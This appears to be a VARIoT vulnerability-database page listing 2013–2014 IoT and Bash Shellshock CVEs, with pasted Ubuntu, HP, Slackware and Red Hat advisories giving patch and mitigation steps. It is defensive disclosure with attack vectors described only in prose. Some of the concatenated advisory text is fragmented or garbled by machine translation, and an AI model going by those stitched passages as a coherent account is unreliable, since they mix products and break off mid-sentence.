VARIoT IoT vulnerabilities database
| VAR-201410-1114 | CVE-2014-6079 | IBM Security Access Manager for Web and Security Access Manager for Mobile Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the Local Management Interface in IBM Security Access Manager for Web 7.x before 7.0.0-ISS-WGA-IF0009 and 8.x before 8.0.0-ISS-WGA-FP0005, and Security Access Manager for Mobile 8.x before 8.0.0-ISS-ISAM-FP0005, allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. ISAM for Mobile is a product that provides mobile access security in one modular package. ISAM for Web is a set of products used in user authentication, authorization, and Web single sign-on solutions. It provides user access management and Web application protection functions. The Local Management Interface in ISAM has a cross-site scripting vulnerability
| VAR-201409-0064 | CVE-2014-3395 | Cisco WebEx Meetings Server Vulnerable to arbitrary file download vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco WebEx Meetings Server (WMS) 2.5 allows remote attackers to trigger the download of arbitrary files via a crafted URL, aka Bug ID CSCup10343. Cisco WebEx Meetings is a networked online conferencing product in Cisco's WebEx conferencing solution.
This issue is being tracked by Cisco bug ID CSCup10343. A security vulnerability exists in CWMS version 2.5 due to the program not properly validating user-supplied input
| VAR-201409-0056 | CVE-2013-3064 | Linksys EA6500 Of firmware ui/dynamic/unsecured.html Open redirect vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter. The Linksys EA6500 is a wireless router device.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. Other attacks are possible
| VAR-201409-0057 | CVE-2013-3065 | Linksys EA6500 Of firmware Parental Controls Section cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Cross-site scripting (XSS) vulnerability in the Parental Controls section in Linksys EA6500 with firmware 1.1.28.147876 allows remote authenticated users to inject arbitrary web script or HTML via vectors related to the Blocked Specific Sites section. Linksys EA6500 is a wireless router device.
Linksys EA6500 has a cross-site scripting vulnerability. Linksys EA6500 is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible
| VAR-201409-1259 | No CVE | Multiple Huawei switch information disclosure vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Huawei Switches is a Huawei switch series device. Huawei Switches All V200R001 devices use the VRP platform for information leakage. The MPLS LSP PING service is bound to an unneeded interface, which can cause device IP leakage. Allow remote attackers to exploit vulnerabilities to obtain sensitive information.
| VAR-201409-1252 | No CVE | Modem Nucom ADSL R5000UN Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Nucom HK Modem Nucom ADSL R5000UN is an ADSL router product from Nucom HK of Hong Kong, China.
An information disclosure vulnerability exists in Nucom HK Modem Nucom ADSL R5000UN. An attacker could use this vulnerability to gain access to sensitive information, leading to further attacks
| VAR-201409-1177 | No CVE | ZyXEL P-660HNU-T1 'wzADSL.asp' Remote Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
ZyXEL P-660HNU-T1 is a wireless router product of ZyXEL technology company.
An information disclosure vulnerability exists in ZyXEL P-660HNU-T1. An attacker could use this vulnerability to gain access to a username and password for further attacks. Vulnerabilities in ZyXEL P-660HNU-T1 version 2.00, other versions may also be affected. ZyXEL P-660HNU-T1 is prone to an information-disclosure vulnerability
| VAR-201409-1158 | No CVE | WS10 Data Server SCADA Buffer Overflow Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
WS10 Data Server is a data acquisition and monitoring system (SCADA) for the industrial automation industry.
A remote buffer overflow vulnerability exists in WS10 Data Server, which originates from the program's failure to perform correct boundary checks on user-supplied data. An attacker could use this vulnerability to execute arbitrary code in the context of an affected application and may also cause a denial of service. There are vulnerabilities in WS10 Data Server version 1.83, other versions may also be affected. Failed exploit attempts will likely result in denial-of-service conditions
| VAR-201409-1154 | CVE-2014-6278 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201409-0013, VAR-E-201409-0022, VAR-E-201409-0023, VAR-E-201409-0012, VAR-E-201409-0010, VAR-E-201409-0017, VAR-E-201409-0018, VAR-E-201409-0020, VAR-E-201409-0016, VAR-E-201409-0021, VAR-E-201409-0561, VAR-E-201409-0562, VAR-E-201409-0565, VAR-E-201409-0554, VAR-E-201409-0556, VAR-E-201409-0555, VAR-E-201409-0545, VAR-E-201409-0557, VAR-E-201409-0552, VAR-E-201409-0558 |
CVSS V2: 10.0 CVSS V3: 8.8 Severity: HIGH |
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277. This vulnerability CVE-2014-6271 , CVE-2014-7169 ,and CVE-2014-6277 Vulnerability due to insufficient fix for.A third party may be able to execute arbitrary commands through a crafted environment. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. ============================================================================
Ubuntu Security Notice USN-2380-1
October 09, 2014
bash vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Bash.
Software Description:
- bash: GNU Bourne Again SHell
Details:
Michal Zalewski discovered that Bash incorrectly handled parsing certain
function definitions. (CVE-2014-6277, CVE-2014-6278)
Please note that the previous Bash security update, USN-2364-1, includes
a hardening measure that prevents these issues from being used in a
Shellshock attack.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.5
Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.6
Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.5
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-2380-1
CVE-2014-6277, CVE-2014-6278
Package Information:
https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.5
https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.6
https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.5
.
Go to the HP Software Depot site at http://www.software.hp.com and search for
HP OneView.
Note: All versions of HP Thin Pro and HP Smart Zero Core operating systems
prior to version 5.1.0 are affected by these vulnerabilities. Following is a
complete list of affected operating systems and Hardware Platforms Affected.
Product Affected
Product Versions
Patch Status
HP ThinPro and HP Smart Zero Core (X86)
v5.1.0 and above
No update required; the Bash shell patch is incorporated into the base
image.
Note: If you participated in the ThinPro 5.1.0 beta program then upgrade to
the release version as soon as it becomes available.
HP ThinPro and HP Smart Zero Core (x86)
v5.0.x
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-5.0-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (x86)
v4.4.x
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.4-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (ARM)
v4.4.x
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.4-arm.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (X86)
v4.1, v4.2, and v4.3
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (ARM)
v4.1, v4.2, and v4.3
A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-arm.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
HP ThinPro and HP Smart Zero Core (X86)
v3.1, v3.2, and v3.3
Download softpaq sp69382 from:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an
update package as: bash_4.1-3+deb6u2_i386.deb .
HP ThinPro and HP Smart Zero Core (ARM)
v3.1, v3.2, and v3.3
Download softpaq sp69382 from:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an
update package as: bash_4.1-3+deb6u2_armel.deb . No other firmware
stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below
for the MDS products. This software versions 6.2(9a) has included the
fixes for the vulnerability in HP StoreFabric C-series MDS switches which
currently supporting NX-OS 6.X releases. This software version 5.2(8e) has included the fix
for the vulnerability in HP C-series MDS switches which currently supporting
NX-OS 5.X releases. All MDS and
Nexus 5K switches can function in this configuration. Access is available
through the console port. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04487573
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04487573
Version: 1
HPSBST03155 rev.1 - HP StoreFabric H-series switches running Bash Shell,
Remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-11-11
Last Updated: 2014-11-11
Potential Security Impact: Remote code execution
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StoreFabric
H-series switches running Bash Shell.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
SSRT101747
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
All HP StoreFabric H-series switches
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP is actively working on a firmware update to resolve the vulnerability in
HP StoreFabric H-series switches. This bulletin will be revised when the
update is available.
MITIGATION INFORMATION
HP recommends the following steps to reduce the risk of this
vulnerability:
- Place the HP StoreFabric H-series switch and other data center
critical infrastructure behind a firewall to disallow access from the
Internet.
- Change all HP StoreFabric switch default account passwords, including
the root passwords, from the default factory passwords.
- Examine the list of accounts, including ones on the switch and those
existing on remote authentication servers such as RADIUS, LDAP, and TACAS+,
to ensure only necessary personnel can gain access to HP StoreFabric H-series
switches. Delete guest accounts and temporary accounts created for one-time
usage needs.
- To avoid possible exploit through the embedded web GUI, QuickTools,
disable the web server with the following procedure:
NOTE: After completing this procedure, the user will not be able to
manage the switch using QuickTools.
1. Login to the Command Line Interface (CLI).
2. Execute the "admin start" command to enter into an admin session.
3. Execute the "set setup services" command and change setting for
EmbeddedGUIEnabled to "False".
HISTORY
Version:1 (rev.1) - 11 November 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)
iEYEARECAAYFAlRih1AACgkQ4B86/C0qfVkTcACgxGfOP4MElysfECAvNJSqkgk2
LCAAn0YGgpGgh493pj4rgB8hPH0PETxo
=X8Sm
-----END PGP SIGNATURE-----
.
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
BACKGROUND
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0 include a vulnerable
version of the Bash shell.
HP has released the following updates to resolve this vulnerability for HP
Vertica products.
Update to the latest VM image available at: https://my.vertica.com
For customers using the AMI version HP Vertica Analytics platform, please
install the latest image available at Amazon.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script.
Patch and maintain Lightweight Directory Access Protocol (LDAP) and web
servers.
Use virus scanners, intrusion detection/prevention systems (IDS/IPS), and
vulnerability scanners regularly.
NOTE: This vulnerability can only be exploited if the attacker already has
valid administrative login credentials.
HP StoreEver ESL E-series Tape Library
- Disable DHCP and only use static IP addressing.
HP Virtual Library System (VLS)
- Disable DHCP and only use static IP addressing
| VAR-201409-1155 | CVE-2014-7169 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201410-0028, VAR-E-201410-0031, VAR-E-201410-0026, VAR-E-201410-0021, VAR-E-201410-0023, VAR-E-201409-0019, VAR-E-201410-0030, VAR-E-201410-0027, VAR-E-201410-0024, VAR-E-201410-0022, VAR-E-201409-0011, VAR-E-201409-0015, VAR-E-201410-0029, VAR-E-201409-0560, VAR-E-201409-0544, VAR-E-201409-0543, VAR-E-201409-0548, VAR-E-201409-0563, VAR-E-201409-0566, VAR-E-201409-0564, VAR-E-201409-0559, VAR-E-201409-0546, VAR-E-201409-0549, VAR-E-201409-0553, VAR-E-201409-0550, VAR-E-201409-0547 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. CVE-2014-6271 This vulnerability is due to an insufficient fix for .A third party may be able to have unspecified impact, such as writing to a file, via a crafted environment. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04467807
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04467807
Version: 2
HPSBGN03117 rev.2 - HP Remote Device Access: Virtual Customer Access System
(vCAS) running Bash Shell, Remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-09-30
Last Updated: 2014-11-11
Potential Security Impact: Remote code execution
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Remote Device
Access: Virtual Customer Access System (vCAS) running Bash Shell.
NOTE: The vCAS product is vulnerable only if DHCP is enabled.
References:
CVE-2014-6271
CVE-2014-7169
SSRT101724
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
All vCAS versions prior to 14.10-38402
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following updates available to resolve the vulnerability in
HP Remote Device Access: Virtual Customer Access System (vCAS) running Bash
Shell.
Customers should upgrade their vCAS systems using the web UI or the
"casupdate" command.
There are also new VirtualBox and VMware ESX images available:
- VMware ESX/ESXi image:
https://h20529.www2.hp.com/apt/hp-rdacas-14.10-38402.ova
- VirtualBox image:
https://h20529.www2.hp.com/apt/hp-rdacas-14.10-38402-vbox.ova
NOTE:
- HP recommends to not power-down or disconnect the vCAS until the
update is available.
- The vCAS pulls down the latest updates from HP by using Ubuntus
apt-get facility.
- HP does not push updates out on to the vCAS so customers will have to
be proactive and install the latest updates.
Actions Required
The DHCP exploit can be mitigated by ensuring that DHCP is disabled on
the vCAS as detailed in MITIGATION INFORMATION below. Download updates by
using a web browser:
1. Connect to the vCAS and login as hp-admin
2. Go to Tools -> Software Updates
3. Under "Manual Actions" select Check now and then upgrade now
See HP Remote Device Access vCAS User Guide, Chapter 4, Software Updates
for more details:
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/action.pro
cess/public/psi/manualsDisplay/?sp4ts.oid=4256914&javax.portlet.action=true&s
pf_p.tpst=psiContentDisplay&javax.portlet.begCacheTok=com.vignette.cachetoken
&spf_p.prp_psiContentDisplay=wsrp-interactionState%3DdocId%253Demr_na-c033816
86%257CdocLocale%253Den_US&javax.portlet.endCacheTok=com.vignette.cachetoken
MITIGATION INFORMATION
A Shellshock attack requires the definition of an environment variable
introduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd
web server, and the DHCP client.
- The exploit does not elevate privileges.
The DHCP client uses Bash scripts and is vulnerable to Shellshock. The
DHCP exploit can be mitigated by ensuring that DHCP is disabled on the vCAS.
Note: HP strongly discourages the use of DHCP on the vCAS.
The web UI forces the vCAS user to assign a static IP address and change
the hp-admin password.
A vCAS user must manually configure DHCP for use on the vCAS.
A vCAS user can verify that DHCP is disabled by inspecting the file
"/etc/network/interfaces" and ensuring that the "iface" line for device
"eth0" is set for a static IP.
Example of a static IP configuration:
# The primary network interface
auto eth0
iface eth0 inet static
address 172.27.1.68
netmask 255.255.255.0
gateway 172.27.1.1
HISTORY
Version:1 (rev.1) - 30 September 2014 Initial release
Version:2 (rev.2) - 11 November 2014 Software updates available
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Additionally two out-of-bounds array accesses in the bash parser are
fixed which were revealed in Red Hat's internal analysis for these
issues and also independently reported by Todd Sabin.
For the stable distribution (wheezy), these problems have been fixed in
version 4.2+dfsg-0.1+deb7u3.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/bash-4.2.048-i486-2_slack14.1.txz: Rebuilt.
Patched an additional trailing string processing vulnerability discovered
by Tavis Ormandy.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-2_slack13.0.txz
Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-2_slack13.0.txz
Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.012-i486-2_slack13.1.txz
Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.012-x86_64-2_slack13.1.txz
Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.012-i486-2_slack13.37.txz
Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.012-x86_64-2_slack13.37.txz
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.048-i486-2_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.048-x86_64-2_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.048-i486-2_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.048-x86_64-2_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.025-i486-2.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.025-x86_64-2.txz
MD5 signatures:
+-------------+
Slackware 13.0 package:
93780575208505d17b5305b202294e16 bash-3.1.018-i486-2_slack13.0.txz
Slackware x86_64 13.0 package:
6ec269c8e958cd6265821b480af8e5d7 bash-3.1.018-x86_64-2_slack13.0.txz
Slackware 13.1 package:
21235413470903bb8eec907acb5b3248 bash-4.1.012-i486-2_slack13.1.txz
Slackware x86_64 13.1 package:
e69bacaf484e8f924c09eacd91c8c737 bash-4.1.012-x86_64-2_slack13.1.txz
Slackware 13.37 package:
fa05abe5c8d6557ec1cef124e5d877ce bash-4.1.012-i486-2_slack13.37.txz
Slackware x86_64 13.37 package:
97a0005c1e0701c8912dc30f8a6f2908 bash-4.1.012-x86_64-2_slack13.37.txz
Slackware 14.0 package:
d319186a0ab7e85562684669afc878c3 bash-4.2.048-i486-2_slack14.0.txz
Slackware x86_64 14.0 package:
8835dc729d6029fc20b6b1b1df72ce13 bash-4.2.048-x86_64-2_slack14.0.txz
Slackware 14.1 package:
fbb4b906de3a8f9bf5209fcc80e2a413 bash-4.2.048-i486-2_slack14.1.txz
Slackware x86_64 14.1 package:
a786b69705d1ebb67fbf31df9d032699 bash-4.2.048-x86_64-2_slack14.1.txz
Slackware -current package:
bba7e4260df8c4d91d99dbf13d44ec79 a/bash-4.3.025-i486-2.txz
Slackware x86_64 -current package:
7c9a285415bd636469da0cf405bb5692 a/bash-4.3.025-x86_64-2.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg bash-4.2.048-i486-2_slack14.1.txz
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address.
MITIGATION INFORMATION
HP recommends the following steps to reduce the risk of this vulnerability:
- The "ssh" or "telnet" features may be disabled by the admin user. All
MDS and Nexus 5K switches can function in this configuration. Access is
available through the console port.
- The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy
Encryption" also known as "Poodle", which could be exploited remotely
resulting in disclosure of information.
References:
CVE-2014-0224
Heartbleed - Remote Unauthorized Access, Disclosure of Information
CVE-2014-3566
POODLE - Remote Disclosure of Information
CVE-2014-6271
Shellshock - Remote Code Execution
CVE-2014-7169
Shellshock - Remote Code Execution
SSRT101835
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP 3PAR Service Processor (SP) versions prior to SP-4.1.0.GA-97.P011,
SP-4.2.0.GA-29.P003, and SP-4.3.0.GA-17.P001.
Shift_JIS, also known as "SJIS", is a character encoding for the Japanese
language. This package provides bash support for the Shift_JIS encoding. ============================================================================
Ubuntu Security Notice USN-2363-2
September 26, 2014
bash vulnerability
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
Summary:
Bash allowed bypassing environment restrictions in certain environments. Due to a build issue, the patch
for CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS
package. This update fixes the problem.
We apologize for the inconvenience. (CVE-2014-7169)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.3
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: bash security update
Advisory ID: RHSA-2014:1311-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1311.html
Issue date: 2014-09-26
CVE Names: CVE-2014-7169 CVE-2014-7186 CVE-2014-7187
=====================================================================
1. Summary:
Updated bash packages that fix one security issue are now available for Red
Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise
Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support,
Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat
Enterprise Linux 6.4 Extended Update Support.
Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AS (v. 4 ELS) - i386, ia64, x86_64
Red Hat Enterprise Linux AUS (v. 6.2 server) - x86_64
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64
Red Hat Enterprise Linux ES (v. 4 ELS) - i386, x86_64
